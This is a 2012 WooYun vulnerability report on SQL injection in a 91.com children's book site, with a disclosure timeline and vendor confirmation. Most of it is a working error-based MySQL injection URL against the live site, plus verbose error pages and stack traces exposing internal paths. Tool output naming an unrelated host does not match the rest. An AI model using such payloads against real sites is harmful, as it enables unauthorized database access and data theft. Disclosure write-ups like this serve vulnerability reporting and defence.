乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-06-16: 细节已通知厂商并且等待厂商处理中 2012-06-18: 厂商已经确认,细节仅向厂商公开 2012-06-28: 细节向核心白帽子及相关领域专家公开 2012-07-08: 细节向普通白帽子公开 2012-07-18: 细节向实习白帽子公开 2012-07-31: 细节向公众公开
网龙某商场站存在注射漏洞首先,恭喜网龙入驻乌云哈。多年前还是玩过你们的游戏的,还是不错的!昨天看到有注册,大致看了下,便有了下文。昨晚不小心点到的。囧。不多说了。你们数据库的表好乱面对带头大哥压力大,面对猫哥的速度,压力大。
正常页面:http://babybook.91.com/Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN
http://babybook.91.com/Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN’“/”应用程序中的服务器错误。SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''83JUNDGO9EQMUXTN''' at line 1说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。 异常详细信息: System.Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''83JUNDGO9EQMUXTN''' at line 1源错误: 执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。堆栈跟踪: [Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''83JUNDGO9EQMUXTN''' at line 1] Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql, DbParameter[] Parameter) +281 Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql) +7 Yaohuasoft.UAP.DAL2.BizBookDAL.SelectTableImpl(Where where, OrderBy orderBy, String tableName) +493 Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(Where where, OrderBy orderBy, Int32 SplitId) +89 Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(String id, Int32 SplitId) +165 Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id, Int32 SplitId) +263 Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id) +45 ND.BabyBook.FrontService.BookService.GetEntity(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Service\FrontService\BookService.cs:558 ND.BabyBook.Web.Book.BookDetail.Bind(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:60 ND.BabyBook.Web.Book.BookDetail.Page_Load(Object sender, EventArgs e) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:43 System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14 System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35 System.Web.UI.Control.OnLoad(EventArgs e) +99 System.Web.UI.Control.LoadRecursive() +50 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627版本信息: Microsoft .NET Framework 版本:2.0.50727.3634; ASP.NET 版本:2.0.50727.3618
http://babybook.91.com/Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%String_Col%%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%20%271%27=%271“/”应用程序中的服务器错误。SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x fro' at line 1说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。 异常详细信息: System.Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x fro' at line 1源错误: 执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。堆栈跟踪: [Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x fro' at line 1] Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql, DbParameter[] Parameter) +281 Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql) +7 Yaohuasoft.UAP.DAL2.BizBookDAL.SelectTableImpl(Where where, OrderBy orderBy, String tableName) +493 Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(Where where, OrderBy orderBy, Int32 SplitId) +89 Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(String id, Int32 SplitId) +165 Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id, Int32 SplitId) +263 Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id) +45 ND.BabyBook.FrontService.BookService.GetEntity(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Service\FrontService\BookService.cs:558 ND.BabyBook.Web.Book.BookDetail.Bind(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:60 ND.BabyBook.Web.Book.BookDetail.Page_Load(Object sender, EventArgs e) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:43 System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14 System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35 System.Web.UI.Control.OnLoad(EventArgs e) +99 System.Web.UI.Control.LoadRecursive() +50 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
用工具上吧。Analyzing http://sol.happigo.com/5107/chat/chat.php?c=1&s=1Host IP: 222.247.56.101Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.10Powered-by: PHP/5.2.10Current DB: babybook
因为贵司的业务比较大。其他网站还没看,建议做一下全检。大补小补的治标不治本。QQ2036234
危害等级:中
漏洞Rank:10
确认时间:2012-06-18 10:06
感谢zeracker提供的漏洞
暂无